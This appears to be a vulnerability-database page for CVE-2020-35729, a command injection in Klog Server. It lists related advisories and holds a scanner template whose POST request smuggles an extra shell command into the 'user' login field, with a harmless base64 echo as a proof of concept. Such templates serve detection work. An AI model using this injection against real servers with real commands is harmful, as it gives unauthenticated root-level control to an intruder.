| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Klog Server 2.4.1 Command Injection Exploit | 15 Feb 202100:00 | – | zdt | |
| CVE-2020-35729 | 5 Jan 202100:00 | – | circl | |
| KLog Server OS Command Injection Vulnerability | 27 Dec 202000:00 | – | cnnvd | |
| KLog Server Command Injection (CVE-2020-35729) | 6 Jan 202100:00 | – | checkpoint_advisories | |
| CVE-2020-35729 | 27 Dec 202004:40 | – | cve | |
| CVE-2020-35729 | 27 Dec 202004:40 | – | cvelist | |
| Exploit for OS Command Injection in Klogserver Klog_Server | 9 Apr 202107:59 | – | githubexploit | |
| Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit) | 25 Jan 202100:00 | – | exploitdb | |
| Klog Server authenticate.php user Unauthenticated Command Injection | 13 Feb 202117:42 | – | metasploit | |
| CVE-2020-35729 | 27 Dec 202005:15 | – | nvd |
id: CVE-2020-35729
info:
name: Klog Server <=2.41 - Unauthenticated Command Injection
author: dwisiswant0
severity: critical
description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
impact: |
An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system.
remediation: |
Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch.
reference:
- https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
- https://nvd.nist.gov/vuln/detail/CVE-2020-35729
- https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/Exploit_Code
- https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/README.md
- https://github.com/Z0fhack/Goby_POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-35729
cwe-id: CWE-78
epss-score: 0.87987
epss-percentile: 0.99746
cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: klogserver
product: klog_server
tags: cve,cve2020,klog,rce,klogserver,vuln
variables:
dummy: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: POST
path:
- "{{BaseURL}}/actions/authenticate.php"
body: 'user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"
matchers:
- type: word
words:
- "poc-testing" # from Base64 decoding payload
# digest: 490a00463044022071ef47041819f695903ba7611ff14ac13351e596fee5f59c66ca43d75f845b9c022032b3b9a95958c6b35f3ac07eb6359ba00f0ab071b28729bd8551c6836a11ce96:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation